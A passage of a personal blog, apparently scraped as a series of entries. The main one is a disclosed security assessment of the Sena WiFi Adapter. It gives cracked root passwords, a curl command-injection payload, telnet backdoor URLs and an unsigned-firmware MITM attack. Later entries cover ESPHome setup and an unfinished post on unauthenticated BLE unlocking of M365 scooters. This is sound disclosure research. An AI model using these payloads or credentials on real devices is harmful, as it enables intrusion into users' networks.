assistant, and a built in FM radio. A huge upgrade from my older SMH10R.\nThe 50R is meant to be controlled via a companion app that allows the user to change the settings. The USB-C port is used for charging and firmware updates. The 50R comes with a WiFi Adapter cable to simultaneously charge the headset and install any available firmware updates.\nSena WiFi Adapter Cable\nThis WiFi Adapter cable is actually a USB-C cable with a WiFi enabled computer inside the cable. This sounds a lot like the COTTONMOUTH implant from the NSA ANT catalog, but much cheaper.\nTo use the WiFi cable, after plugging it in and waiting for it to boot, it creates its own WiFi access point, which the app connects to allowing the user to configure the cable to connect to their home\u0026rsquo;s WiFi network. Now every time a headset is plugged into the USB-C end of the cable, it will check for firmware updates and install them.\nSena must really want everyone to have up to date firmware to build a WiFi enabled firmware updating computer inside of a USB cable.\nSecurity Assessment Being the curious security minded person that I am, I decided to investigate this computer inside my new USB cable.\nPhysical Assessment Removing 4 screws and disconnecting the USB upstream and downstream cables is all it takes to see the internal components.\nThe main SOC (System On Chip) is a SONiX SN98600 containing an ARM9 CPU and 64MB of RAM. There is a 16MB Winbond 25Q128JVP0 SPI flash storage chip, and a Realtek RTL8188EU WiFi interface.\nThere are some test points, three of which are conveniently labeled GND, TX, and RX. Which looks like a lot like UART! Connecting these test points to a logic analyzer and monitoring the signals while applying power confirms that it is an async serial configured for 115200 8N1.\nMonitoring the UART while rebooting reveals that the device is using the U-BOOT boot loader to boot Linux kernel 2.6.35.12. While the Linux kernel boots, the boot logs provide more details on the hardware and its configuration on the device and then drops to a login prompt.\nDumping the Flash In order to dump the contents of the SPI flash chip to better examine the system\u0026rsquo;s file-system there are two options.\nConnect the SPI flash chip to a device that speaks SPI like the FT232H and use the flashrom tool to dump the contents. Find a way to read and dump the flash contents from within the device. The first option is cleaner and is my preferred method. I connected GND, MISO, MOSI, CS, CLK, and 3.3 VCC to my SPI dumper and tried to identify the chip with flashrom -p ft2232_spi:type=232h --flash-name. However providing power to the SPI chip also supplied power to the main SOC and other components on the board causing them to boot and also send commands to the SPI flash, making a clean read impossible. I could have desoldered the chip and read it without powering the rest of the device, but that runs the risk that I might physically damage something in the process, so I decided to give the second option a try.\nI did not know any valid logins to get past the Linux login prompt (I tried a lot of the common defaults), but what about the boot loader? The U-BOOT boot loader was configured to immediately start the Linux kernel after loading. My colleague Matthew Garrett proposed an ingenious idea, glitch U-BOOT into dropping to a shell. The idea is that after U-BOOT itself loads, it loads the Linux kernel from the SPI flash into RAM, and then boots it. If this process can be tricked into erroring then then it may drop to an interactive U-BOOT shell. This can be accomplished by interfering with the SPI MISO signal while U-BOOT is loading the kernel so that it loads a corrupt kernel and is unable to boot it. I did this by watching the console output and shorting the SPI MISO to ground very briefly while it was loading the kernel image. This took a few tries to get right, but it did result in U-BOOT entering an interactive shell.\nU-BOOT can be compiled to include different utilities or commands to get the system booting. This version included the following two commands of interest:\nspi read addr offset len - read \u0026#39;len\u0026#39; bytes starting at \u0026#39;offset\u0026#39; to memory at \u0026#39;addr\u0026#39; md [.b, .w, .l] address [# of objects] spi read reads data from the SPI chip into memory at a specified location. md displays the contents of memory at the provided location in a hexdump like format. I could tell from the boot logs that the Linux kernel is loaded into memory starting at address 0x00008000 so that address should be safe to load flash data to, and the entire flash is 16M, which is 0x1000000 byes in hex.\nUsing these two commands it is possible to load all of the flash to memory and then dump it over the UART. I used screen -L as the serial console so that all of the UART results would be saved to a file.\nscreen -L /dev/ttyUSB0 115200 spi read 0x00008000 0 0x1000000 md 0x00008000 1000000 slowly dumping the SPI flash over UART\nThe spi read operation took about one second to complete, however due to the inefficiency of loading 16M of data in hexdump format over a 115200 baud connection the md operation took the better part of a day. Reading the SPI chip directly would have been much faster, but I did not want to risk it.\nOnce the dump finishes xxd can be used to convert it from the hexdump format to binary.\nxxd -r hexdump.txt flash.bin Since the md command started at offset 0x8000, xxd will prepend nulls (0x00) to the file to make the offsets align. dd can be used to trim the extra data added for the memory offsets leaving just the flash data with the correct offsets.\ndd if=flash.bin of=flash_trim.bin bs=1 skip=$((0x8000)) Since the flash was dumped from RAM, it needs to be converted from big-endian to little-endian. This can be done with objcopy.\nobjcopy -I binary -O binary --reverse-bytes=4 flash_trim.bin sena_wifi.bin The boot logs contain the partition table, which can be used to extract the individual partitions on the flash.\nhw-setting=0x00000000 0x00000FFF u-boot=0x00003000 0x0007DFFF u-env=0x0007E000 0x0007E000 flash-layout=0x0007F000 0x0007FFFF factory=0x00080000 0x000BFFFF kernel=0x000C0000 0x003BFFFF rootfs-r=0x003C0000 0x00ABFFFF rootfs-app=0x00ABFFFF 0x00ABFFFF rootfs-rw =0x00EC0000 0x00FBFFFF user=0x00FC0000 0x00FFFFFF u-logo=0x00FFFFFF 0x00FFFFFF rescue=0x00AC0000 0x00EBFFFF dd if=sena_wifi.bin of=hw_setting.bin bs=1 skip=$((0x00000000)) count=$((0x00000FFF-0x00000000)) dd if=sena_wifi.bin of=u-boot.bin bs=1 skip=$((0x00003000)) count=$((0x0007DFFF-0x00003000)) dd if=sena_wifi.bin of=u-env.bin bs=1 skip=$((0x0007E000)) count=$((0x0007E000-0x0007E000)) dd if=sena_wifi.bin of=flash-layout.bin bs=1 skip=$((0x0007F000)) count=$((0x0007FFFF-0x0007F000)) dd if=sena_wifi.bin of=factory.bin bs=1 skip=$((0x00080000)) count=$((0x000BFFFF-0x00080000)) dd if=sena_wifi.bin of=kernel.bin bs=1 skip=$((0x000C0000)) count=$((0x003BFFFF-0x000C0000)) dd if=sena_wifi.bin of=rootfs-r.bin bs=1 skip=$((0x003C0000)) count=$((0x00ABFFFF-0x003C0000)) dd if=sena_wifi.bin of=rootfs-app.bin bs=1 skip=$((0x00ABFFFF)) count=$((0x00ABFFFF-0x00ABFFFF)) dd if=sena_wifi.bin of=rootfs-rw.bin bs=1 skip=$((0x00EC0000)) count=$((0x00FBFFFF-0x00EC0000)) dd if=sena_wifi.bin of=user.bin bs=1 skip=$((0x00FC0000)) count=$((0x00FFFFFF-0x00FC0000)) dd if=sena_wifi.bin of=u-logo.bin bs=1 skip=$((0x00FFFFFF)) count=$((0x00FFFFFF-0x00FFFFFF)) dd if=sena_wifi.bin of=rescue.bin bs=1 skip=$((0x00AC0000)) count=$((0x00EBFFFF-0x00AC0000)) With the individual partitions extracted they can be explored with tools like file, strings, Binwalk, or mounted on another Linux system. The rootfs-r and rootfs-rw seem to the the only partitions with real file-systems and can be mounted locally with the following commands.\nmount -t cramfs -o loop,ro rootfs-r.bin rootfs-r/ modprobe mtdblock dd if=rootfs-rw.bin of=/dev/mtdblock0 mount -t jffs2 -o ro /dev/mtdblock0 rootfs-rw/ Now the file-systems can be explored locally.\nPasswords There are two /etc/shadow files, one on rootfs-r and another on rootfs-rw. One is mounted over the other during boot. The root password from rootfs-r was hashed with md5crypt which the online service OnlineHashCrack.com was able to crack for free revealing it was 1234. However this password did not work for the UART Linux login prompt, meaning the rootfs-rw partition is likely mounted over it.\nThe rootfs-rw partition\u0026rsquo;s /etc/shadow root password was hashed with the much more secure DEScrypt algorithm. I was able to submit this hash to crack.sh and have it cracked in a day revealing the password snowtalk. They say a picture is worth 1000 words:\nRoot shell on Sena WiFi Adapter\nIt worked! Root shell acquired! It\u0026rsquo;s now possible to poke around the running system which is much more valuable than just exploring the file-system dump created earlier.\nSena has another product called the Snowtalk, which makes me wonder if aside from poor password choice if there is any password reuse going on\u0026hellip;\nNetwork Analysis The Sena WiFi adapter can act as its own AP (wireless access point) for initial configuration; or join an existing wireless network (for updating firmware). In both modes the same services appear to be running on the device. The only service of interest is an HTTP server running on port 8000, that the companion app sends requests to, but more on that later.\nWhen in normal mode (as a client connected to WiFi), the WiFi adapter sends out periodic requests to check for firmware updates for itself, and any headset that may be connected.\nIn order to view and tamper with the outbound requests I made a simple DNS and HTTP MITM server that would log and respond to any requests the device made on the network. Using this tool I was able to discover that all of its outbound requests are to http://firmware.sena.com. This is interesting because it only used HTTP and not HTTPS, which means the traffic can be easily inspected and it is possible to serve different content to the adapter without it knowing.\nNetwork Behavior First, periodic requests are made to http://firmware.sena.com/senabluetoothmanager/WiFiCradle/check.cdat to check for Internet connectivity. Once Internet connectivity is established, a request to http://firmware.sena.com/senabluetoothmanager/WiFiCradle/fw_restore_ver_adapter.cdat is made to determine if the WiFi adapter needs to update its own firmware, if so it will download an ARM ELF executable from the same server and run it. If there is a newer adapter firmware available it will download the binary http://firmware.sena.com/senabluetoothmanager/WiFiCradle/FIRMWARE_660R_X.X_ADAPTER.bin and run it, where X.X is the firmware version.\nAfter the WiFi adapter is satisfied that it is running the latest firmware, it will make a request to http://firmware.sena.com/senabluetoothmanager/Firmware to get a list of all the firmware available for all of Sena\u0026rsquo;s headset products. If it determines that there is a newer firmware available for the connected headset, it will download and run http://firmware.sena.com/senabluetoothmanager/WiFiCradle/loader.capp which is another ARM ELF executable to start the firmware updating process. This loader.capp will determine which headset is connected by looking at the USB Product ID (PID), and then download http://firmware.sena.com/senabluetoothmanager/WiFiCradle/updater_0x####.capp, where 0x#### is the USB PID in hex. This is another binary file that is run, specific to the particular headset that is connected. For my 50R, this was updater_0x3134.capp. Finally, the updater program will download the latest firmware image and flash it to the headset using DFU. In my case this was http://firmware.sena.com/senabluetoothmanager/50R-v1.0.4.img.\nNetwork MITM What\u0026rsquo;s important to note here is that all the binaries are downloaded over HTTP, and there is no signature validation. This means anyone able to intercept network requests can provide other binaries and the WiFi adapter will blindly download and run them. To test this I created my own versions of the binaries, but I used the following shell script:\n#!/bin/sh ping -c 1 hacked.com Surprisingly this worked even though it was a script and not an ELF binary. As I was still monitoring the network traffic, I could see the DNS request being made for hacked.com and then ICMP requests being sent to it. This worked for all of the previously mentioned binary files. This allows for Remote Code Execution as long as the attacker is on the same network as the adapter and able to impersonate the firmware.sena.com HTTP server. Combined with ARP Spoofing, an attacker only needs to be on the same network to make the adapter think that the attacker is the gateway allowing then to impersonate the HTTP update server and send malicious updates.\nBut can the attack be better?\nReverse Engineering With access to the file-system and binaries that are running on the device from the prior work, it is now possible to examine the HTTP API server query.cgi listening on port 8000. This API is used by the companion apps.\nSince the query.cgi HTTP server runs when the adapter is in AP mode, and when connected to another network, It is possible to make calls to it from any computer on the same network it is connected to, and even instruct it to switch to AP mode, or from AP mode and connect to another network from the Android app. There is no authentication for the API or for the network when in AP mode making the API a great target.\nMonitoring the network traffic between the Android app and the WiFi adapter (IP:10.42.0.1) reveals that all the API calls are HTTP GET request with parameters and values in the query-string, and responses returned in the HTTP body.\nhttp://10.42.0.1:8000/cgi-bin/query.cgi?cmd=getaplist http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=app_version http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setssid\u0026amp;value=WiFiNetworkName http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=getlog This appears to be a very simple RPC API where the cmd parameter is the function to call and any arguments are provided with the value parameters.\nSome API calls reveal a lot of information. For example, one such call returns the user\u0026rsquo;s WiFi password, which could be used by an attacker to get onto a victim\u0026rsquo;s home network if they de-auth the WiFi adapter putting it into AP mode first.\nIn order to determine how the API calls are implemented and if there are any other hidden API calls available, the query.cgi can be examined with a software reverse engineering tool like Ghidra.\nTaking a look at setssid I looked at the setssid command first to see how the user supplied data was being processed. After setting the WiFi SSID in the [wpa_supplicant.conf](https://linux.die.net/man/5/wpa_supplicant.conf) file it also sets the hostname of the WiFi adapter to the provided value with the following code:\nsetssid() function\nAt first pass this may seem fine, but upon further inspection I noticed that the user supplied value, param_1 in this case, was being put into a string with sprintf() and then passed to system(), which will pass the command to the shell. This is a vulnerability.\nIf I pass the value sena1337\u0026quot;;ping -c1 \u0026quot;hacked.com, then the string passed to system() will end up being /bin/hostname \u0026quot;sena1337\u0026quot;;ping -c1 \u0026quot;hacked.com\u0026quot; which will set the hostname to \u0026ldquo;sena1337\u0026rdquo; and then run the second command provided, in this case, ping. This works because the ; character tells the shell to treat everything after it as a separate command.\nSince setting the SSID is a feature provided by the mobile app, it might be possible to use it to perform run commands, however it seems Sena thought of that and prevented it.\nSena Android App command injection\nBut this is only the Android app sanitizing the input and preventing the use of special characters in this API call. It is possible to bypass the app and make the call directly with curl and URL encoding the parameters:\ncurl \u0026#39;http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setssid\u0026amp;value=sena1337%22%3Bping%20-c1%20%hacked.com\u0026#39; After running the above command while the adapter was on my home network, I observed both a DNS query for hacked.com and an ICMP ping request sent as well. This is known as Command Injection, and it worked here because the user input was only validated on the client (Android app) and not the server (HTTP API). While the ping here is harmless, it can be replaced with any other command which the WiFi adapter will run as root. Another RCE!\nFinding a Backdoor After further examination of the HTTP API code I found a few more interesting API calls. The WiFi adapter has two test modes that change the endpoints the adapter uses to check for firmware updates. These are likely used internally at Sena for development and debugging. When in test mode the WiFi adapter also starts a telnet server listing on port 23. And of course, there is a API call to just enable the telnet server directly in the normal mode too. A HTTP GET request to any of these endpoints will start the telnet server:\nhttp://10.42.0.1:8000/cgi-bin/query.cgi?cmd=telnetd http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setconf\u0026amp;key=testmode\u0026amp;value=1 http://10.42.0.1:8000/cgi-bin/query.cgi?cmd=setconf\u0026amp;key=testmode\u0026amp;value=2 Once started, anyone on the same network can connect to it. The telnet server does require authentication, but the previously acquired password works providing another root shell. More RCE!\nLooking at Another System Call There are many places that the HTTP API will make a system() call to wget in order to download a file from the Internet such as the previously mentioned firmware updates or binaries that it runs as part of the update process. All of the calls to wget look like this:\nwget system() call\nHere the code clearly shows us that wget is always called with the --no-check-certificate flag, which means that even if HTTPS was used, the certificate would not be checked, still allowing an attacker to provide any binary or firmware they want.\nAfter reviewing more of the code, I suspect that the same code and hardware that are in this WiFi adapter are also in Sena\u0026rsquo;s WiFi Docking Station, Implying it is vulnerable to the same attacks. There were even references to unreleased and unannounced Sena products in the reversed code as well.\nConclusion These findings provide a potential attacker multiple ways to remotely get root shell access to the WiFi Adapter cable. From here they can flash malicious firmware to the adapter and helmet, or use the adapter as a pivot point and attack other devices on the user\u0026rsquo;s home network. If the attacker was able to flash malicious firmware onto a headset, it could lead to injury or even loss of life if the bad firmware was able to distract or incapacitate a driver.\nUnfortunately these types of vulnerabilities are common on IoT devices like this where security is not a high concern.\nFindings List weak dictionary word password no signature verification for update images or binaries loaded over the network no TLS used for remote connections command injection on HTTP API SSL certificate checking disabled telnet backdoor One hypothetical full attack chain could go like this: an attacker scans for Sena WiFi adapters around them identifying them by MAC address OUI prefix. Once found, send a WiFi de-auth frame to the adapter causing it to go into AP mode, if not already. Then connect to the WiFi adapter, and get a root shell using either the telnet backdoor and password, or command injection. From here the attacker can steal the user\u0026rsquo;s home WiFi password, use the adapter as a pivot to attack other devices on the victim\u0026rsquo;s network, backdoor the firmware to provide malicious firmware updates to any connected headsets, and more. All wirelessly without physical access to the WiFi adapter.\nDisclosure Timeline As a long-time user and advocate of Sena products, I\u0026rsquo;d like to work with them to fix these issues and make them more secure for everyone. Unfortunately that was more difficult than ideal. I was unable to get in contact with anyone at Sena to disclose the vulnerabilities when I initially found them in September 2020. It was not until after I gave them 90 days and submitted my original draft of this post to them in December that they eventually respond to me and started working to fix the issues. I gave them an additional few months to fix the issues as it was my goal to get the problems fixed.\n09/24/2020 - I had great difficulty finding any contact information for Sena to report these findings. I started by emailing sales.us@sena.com and sena.it@sena.com, and was told to file a support ticket. 09/25/2020 - Sent a Twitter DM to @senabluetooth, who also told me to file a support ticket. I filed support ticket #390170 to start the conversation for disclosure. The support reps said they would pass along my claim to upper management and then closed the ticket. However I was unable to provide details of the vulnerabilities to them. 09/26/2020 - I emailed security@sena.com (bounced), privacy@sena.com, info@sena.com, and it@senausa.com, but got no responses. I even found what I believed to be their CIO\u0026rsquo;s email and emailed them directly and got no response. Still I decide to give them 90 days before I publish this post in case they are working internally on a fix. 12/23/2020 - I sent a draft of this post to the Sena support team and CIO. 12/24/2020 - Sena\u0026rsquo;s CIO finally responds to my email and forwards the information to the product team. 12/25/2020 - Sena\u0026rsquo;s CTO reached out to me to let me know their development team is investigating the issues. 12/29/2020 - Sena confirms everything in the above report to be correct, and asks that I postpone publishing until the end of February 2021. I agree. 02/26/2021 - Sena releases WiFi Adapter firmware v1.1 and updates to their mobile apps with fixes to the findings above. 03/08/2021 - I publish this blog post. Note I have not gotten around to testing the Sena updates to verify that all of the issues described here are sufficiently mitigated. I\u0026rsquo;ll update this post if I get around to testing them.\nSena was nice enough to send me a free Sena 50R for submitting the issue to them and for waiting for them to release a fix before publishing this post.\n","permalink":"https://lanrat.com/posts/sena-wifi-adapter-security/","summary":"\u003cp\u003eThis post outlines a security assessment of the new Sena Wifi Adapter I performed last summer for fun.\u003c/p\u003e\n\u003cp\u003eWith the world on lock-down due to COVID-19, I spent a lot of time last summer escaping the city going on motorcycle rides through the mountains and forests surrounding the bay area. It\u0026rsquo;s the perfect social distance activity because if you get within 6ft of someone you are likely to crash. One of my favorite motorcycle accessories is my Sena headset. It allows me to listen to navigation or music from my phone over Bluetooth while riding, and talk to other riders in my group.\u003c/p\u003e","title":"Sena WiFi Adapter Security Assessment \u0026 Vulnerabilities"},{"content":"Luxer One is a Python API client for the Luxer One Residential package management system. The library provides programmatic access to check package delivery status, retrieve pending packages, and interact with smart locker systems commonly found in apartment complexes and residential buildings.\nThe client handles authentication with the Luxer One API and includes example code demonstrating basic operations such as logging in and querying package information. This enables automated monitoring and management of package deliveries through the Luxer One platform.\n","permalink":"https://lanrat.com/projects/luxer-one/","summary":"\u003cp\u003eLuxer One is a Python API client for the Luxer One Residential package management system. The library provides programmatic access to check package delivery status, retrieve pending packages, and interact with smart locker systems commonly found in apartment complexes and residential buildings.\u003c/p\u003e\n\u003cp\u003eThe client handles authentication with the Luxer One API and includes example code demonstrating basic operations such as logging in and querying package information. This enables automated monitoring and management of package deliveries through the Luxer One platform.\u003c/p\u003e","title":"Luxer One"},{"content":"A while ago I received a bunch of bare ESP-WROOM-02 chips on tape, but I could not find enough documentation to program them (partially out of laziness). With my recent interest in ESPHome, I decided to give them another try. This blog post contains the results of my research on how to program them.\nESP-WROOM-02\nThe ESP-WROOM-02 is just a ESP8266 underneath. If you don\u0026rsquo;t have a breakout board like me, then you will need a UART adapter and make a few minimal solder connections to set the various boot modes to allow you to program the firmware. Once programmed for the first time, you can use OTA updates to allow flashing firmware over WiFi and not need to mess with the wiring every time you want to reprogram it.\nThe pinout of the ESP-WROOM-02 from its datasheet is as follows:\nESP-WROOM-02 pinout\nPowering the ESP-WROOM-02 At a minimum, to power the chip, you\u0026rsquo;ll need to provide 3.3v to pin 1, and ground to pin 9 or pin 18. You\u0026rsquo;ll also need to pull the EN pin high to enable the chip. The correct way to do this is to use a 10k resistor between pin 2 and your 3.3v power source, but I just bridged pin 1 and pin 2 so that the ESP is always enabled when receiving power. This is a hack, but good enough for my purposes.\nWhen the RST pin 15 goes from low (GND) to high or floating it will reset the ESP. This can also be achieved by reapplying power, so it is not strictly needed for programming but can be nice to have.\nBoot modes If you were to power on the ESP-WROOM-02 as described above and look at the serial output at 74880 8n1 you would see the following message from the boot-loader:\n\\xFF ets Jan 8 2013,rst cause:1, boot mode:(7,0) waiting for host The boot mode shows the current and previous boot mode as mode:(current, previous).\nBoot Mode Table\nBoot Cause Table\nWe only care about booting from UART for programming and from flash for running the program.\nIn order to boot to UART for programming IO0 and IO15 need to be held low (GND) while the ESP boots up. Once in UART programming mode the ESP will switch to 115200 8n1 and wait for a program to be loaded.\nTo boot normally and run your flashed program IO15 needs to be held low (GND) and IO0 can be held high (with a resistor to 3.3v) or left floating.\nAfter the ESP is booted (in either mode) IO0 and IO15 can be repurposed for other GPIO. They only need to be held high/low during boot to set the correct boot mode.\nAfter programming is done, you may need to manually reset the ESP (with RST or reapplying power) and change the configuration to make it boot to the freshly programmed code.\nTo make things as simple as possible, if you don\u0026rsquo;t need to use IO0 and IO15 for your project, IO15 can be permanently wired to GND, and IO0 to a switch to GND to allow for easy programming.\nESP-WROOM-02 breadboard setup with FT232H UART adapter\nPhoto of my ESP-WROOM-02 connected to an Adafruit FT232H UART adapter.\nESPHome I\u0026rsquo;ve decided to use ESPHome as the framework to load code onto the ESP-WROOM-02, but it is also possible to use the much more lightweight Arduino ESP8266 framework as well. ESPHome can be installed inside Docker or with pip.\nBelow is a minimal ESPHome yaml configuration file to get the ESP online and configured to allow flashing further firmware updates over WiFi. Be sure to update the placeholder values with your own. You can also enable other sensors or integrations supported by ESPHome.\nesphome: name: esphome-wroom-02 platform: ESP8266 board: esp_wroom_02 wifi: ssid: \u0026#34;YOUR_WIFI_SSID\u0026#34; password: \u0026#34;YOUR_WIFI_PASSWORD\u0026#34; # Enable fallback hotspot (captive portal) in case wifi connection fails ap: ssid: \u0026#34;ESP-WROOM-02\u0026#34; password: \u0026#34;\u0026#34; # fallback mechanism for when connecting to the configured WiFi fails. captive_portal: # enable OTA for firmware flashing over WiFi ota: password: \u0026#34;YOUR_SECURE_PASSWORD_HERE\u0026#34; # Enable logging logger: # enable local web server web_server: port: 80 When you are ready to flash your ESP-WROOM-02 with ESPHome, just pass the yaml configuration file as an argument to the ESPHome command after connecting your UART.\nesphome esp-wroom-02-example.yaml run This will flash the ESP-WROOM-02 with ESPHome with your settings and then start displaying the logs being sent from the ESP over UART. At this point it is now safe to kill the command and disconnect the UART.\nWhenever you power on the ESP-WROOM-02 it will connect to your network and run the configuration you loaded onto it. If you ever want to flash an updated firmware, you can use the http server now running on the ESP to upload a new firmware (be sure to have it set to connect back to the same network) or use the same esphome run command without the UART connected to upload new firmware wirelessly. You can also use esphome logs to view the logs wirelessly without uploading new firmware.\n","permalink":"https://lanrat.com/posts/programming-bare-esp-wroom-02/","summary":"\u003cp\u003eA while ago I received a bunch of bare ESP-WROOM-02 chips on tape, but I could not find enough documentation to program them (partially out of laziness). With my recent interest in \u003ca href=\"https://esphome.io/\"\u003eESPHome\u003c/a\u003e, I decided to give them another try. This blog post contains the results of my research on how to program them.\u003c/p\u003e\n\u003cfigure\u003e\n    \u003cimg loading=\"lazy\" src=\"images/esp-wroom-02-chip.webp\"\n         alt=\"ESP-WROOM-02\"/\u003e \u003cfigcaption\u003e\n            \u003cp\u003eESP-WROOM-02\u003c/p\u003e\n        \u003c/figcaption\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eThe ESP-WROOM-02 is just a ESP8266 underneath. If you don\u0026rsquo;t have a breakout board like me, then you will need a UART adapter and make a few minimal solder connections to set the various boot modes to allow you to program the firmware. Once programmed for the first time, you can use OTA updates to allow flashing firmware over WiFi and not need to mess with the wiring every time you want to reprogram it.\u003c/p\u003e","title":"Programming Bare ESP-WROOM-02"},{"content":"Extsort is a Go library that implements external sorting algorithms for datasets larger than available memory. The library manages temporary files and memory buffers to sort data that cannot fit entirely in RAM.\nThe implementation uses merge sort with configurable buffer sizes and temporary file management. It provides a standard Go interface for sorting operations while automatically handling the complexity of disk-based intermediate storage and merging phases.\n","permalink":"https://lanrat.com/projects/extsort/","summary":"\u003cp\u003eExtsort is a Go library that implements external sorting algorithms for datasets larger than available memory. The library manages temporary files and memory buffers to sort data that cannot fit entirely in RAM.\u003c/p\u003e\n\u003cp\u003eThe implementation uses merge sort with configurable buffer sizes and temporary file management. It provides a standard Go interface for sorting operations while automatically handling the complexity of disk-based intermediate storage and merging phases.\u003c/p\u003e","title":"Extsort"},{"content":"Allxfr performs DNS zone transfers (AXFR) against nameservers to retrieve complete zone files. The tool systematically attempts zone transfers against root zone servers and other configured nameservers to discover available zone data.\nThe program supports both IPv4 and IPv6 connections and includes options for parallel transfers, dry-run operations, and zone file storage. It implements the DNS AXFR protocol to request complete zone transfers from authoritative nameservers that permit such operations.\n","permalink":"https://lanrat.com/projects/allxfr/","summary":"\u003cp\u003eAllxfr performs DNS zone transfers (AXFR) against nameservers to retrieve complete zone files. The tool systematically attempts zone transfers against root zone servers and other configured nameservers to discover available zone data.\u003c/p\u003e\n\u003cp\u003eThe program supports both IPv4 and IPv6 connections and includes options for parallel transfers, dry-run operations, and zone file storage. It implements the DNS AXFR protocol to request complete zone transfers from authoritative nameservers that permit such operations.\u003c/p\u003e","title":"Allxfr"},{"content":"Minimalin Watch Face is a minimalistic Wear OS watch face featuring clean typography and Material Design aesthetics. The watch face displays time with customizable complications and supports ambient mode for always-on displays with reduced power consumption.\nInspired by the original Pebble Minimalin watch face, this Wear OS implementation includes configurable color themes, center complications for additional information display, and optimized rendering for various screen sizes and densities across different smartwatch models.\n","permalink":"https://lanrat.com/projects/minimalin-watch-face/","summary":"\u003cp\u003eMinimalin Watch Face is a minimalistic Wear OS watch face featuring clean typography and Material Design aesthetics. The watch face displays time with customizable complications and supports ambient mode for always-on displays with reduced power consumption.\u003c/p\u003e\n\u003cp\u003eInspired by the original \u003ca href=\"/projects/minimalin-reborn/\"\u003ePebble Minimalin watch face\u003c/a\u003e, this Wear OS implementation includes configurable color themes, center complications for additional information display, and optimized rendering for various screen sizes and densities across different smartwatch models.\u003c/p\u003e","title":"Minimalin Watch Face"},{"content":"Sometime in the first half of 2018 there was an explosion of \u0026ldquo;Dockless e-scooters\u0026rdquo; appearing all over the Bay Area. These devices are electric scooters that anyone can rent for a one-way trip and find/leave them (at the time) anywhere you want. As one could guess this led to lots of issues but they where convenient and I wanted one of my own so I did a little research onto how to acquire one for private use.\nXiaomi M365\nIt turns out that two of the three big players at the time Bird and Spin both used off-the-shelf consumer electric scooters made by Xiaomi often sold as the M365. While these scooters were sold by Xiaomi it appears that they were actually designed and built by Segway-Ninebot which Xiaomi has purchased from them. Knowing this it was easy to find them for sale online.\nWe live in a world where there is \u0026ldquo;an app for that\u0026rdquo; for everything, and this scooter is no exception. While the scooter can be used without an app, it will have limited functionality and you will not be able to change any of the settings or enable any of the \u0026ldquo;security\u0026rdquo; features or \u0026ldquo;lock\u0026rdquo; the scooter.\nWhen \u0026ldquo;locked\u0026rdquo; the scooter will use the motor to add resistance to the front wheel to make using it difficult or impossible to turn and sound its alarm\u0026rsquo;s beep. This won\u0026rsquo;t stop all theft but it is a good deterrent. Additionally, you can set a numeric pass-code on the scooter that you will need to enter in the app for the scooter to turn on.\nThe App The Xiaomi provided App was an all-in-one solution for every IOT thing they offer. I guess if you are deep into the Xiaomi ecosystem this makes sense, but for the simple scooter control I wanted this was overkill. Additionally the permissions the app requested made the privacy enthusiast in my cry out in terror. It wants access to almost everything Android offers, which is way overkill for a scooter control application, and likely still overkill for every other IOT device they produce. Not to mention, what while Xiaomi does make some nice things, they are based out of China which is where they produce their hardware and software which may be cause for concern.\nI thought that if I could reverse-engineer the scooter portion of the Xiaomi App and put it into my own app it would solve these problems. Unfortunately the Xiaomi App was heavily obfuscated and the scooter code was a very small portion of the larger app which was all jumbled together. While I\u0026rsquo;m sure it would have been possible to do this, I set out to find an easier solution.\nBefore Xiaomi bought the scooter designs from Ninebot they had their own app to control their scooters. This is a much smaller app that was mostly just the code for the scooters. Unfortunately, Since Xiaomi took over the M365 NineBot has updated their app to no longer work with the Xiaomi scooters. (WHY???) Alas, version 4.3.0 and below still work with the Xiaomi M365 and can be found online and side-loaded manually.\nHowever, while Ninebot\u0026rsquo;s app required many less permissions than Xiaomi\u0026rsquo;s app, it still required more permissions than I was comfortable with. So I continued my journey to reverse-engineer the simpler NineBot app to implement my own solution.\nReverse Engineering Pre-existing work Luckily for me there was already a community built around modding the M365 scooters who had already started reverse-engineering some of the functionality. Most of the prior word was focused around modding the firmware of the M365 itself to change built-in functionality like the removing the speed governor and increasing the rate of acceleration. If you are interested in that, you can generate custom firmware images at M365 Botox and an app to flash them on Google Play.\nIf you did try to create a custom firmware image for the scooter and flash it, you will notice that the firmware flasher application send the firmware over Bluetooth Low-Energy (BLE). And it can replace the firmware on a device that is \u0026ldquo;locked\u0026rdquo;\u0026hellip; Oh oh!\nBluetooth Low Energy The BLE packet format has already been well-documented in the prior work and salvamr created the wonderful m365-ble-msg-builder Java API that simplifies the work required to send/receive BLE packets in a format that the Scooter wants. Additionally maisi\u0026rsquo;s M365-Power App to display log data from the Scooter made a good place to start.\nAll I needed was to find the BLE packets for the commands I want to implement from the NineBot application and make my own app to send them and parse any responses.\nIt should also be noted that the normal Bluetooth pairing process does involve a sort of mutual authentication between devices that helps add a layer of security on top of the Bluetooth channel making it harder for any Bluetooth device start talking to any other device. However, Bluetooth Low Energy lacks built-in authentication, relaying on the application layer to handle the authentication (if any).\nNineBot App After spending some time digging through the decompiled output of the NineBot app I obtained a fairly good understanding of how the auth works, to summarize, it goes something like this:\nApp pairs with Scooter using BLE UART App asks Scooter for saved passcode Scooter provides App the saved passcode App asks user for passcode App compares the two passcodes If passcode match, App send \u0026ldquo;unlock\u0026rdquo; packet to scooter If passcode do not, app shows error to user. It does not take a security mastermind to figure out the obvious problem here. The authentication is performed \u0026ldquo;client-side\u0026rdquo;. Which means that the device a user controls (their phone running the app) is in charge of deciding for itself if it should be allowed in.\nAn example of client side auth in the real world\nM365 Goals At this point I\u0026rsquo;ve become interested in the BLE packets for the following sensitive actions:\nUnlock the scooter Lock the scooter Read the saved password from the Scooter Save a new password to the Scooter I was able to find the packets for retrieving and setting the passcode fairly easily, and with some help from my friend Brandon Weeks I found the lock and unlock passcode as well and implemented them into a simple test application.\nM365-Toolbox Using the M365-Power app as a base, I created M365-ToolBox to test sending the interesting packets. Surprisingly everything just worked. When sending any of the packets, such as unlock, the scooter would happy respond with a \u0026ldquo;chirp\u0026rdquo; and unlock itself without any fuss. Every command I tested worked pre-authentication. So, not only was the authentication handled client-side. The scooter didn\u0026rsquo;t even care if you skipped the authentication step and just told it what you wanted it to do. I tested on a few other scooters and they all worked the same. I could remotely unlock/lock any scooter without knowing its password, additionally, I could read the passwords other users have set and even change them resulting in a Denial of Service.\nM365 Toolbox Screenshot\nIf I wanted to 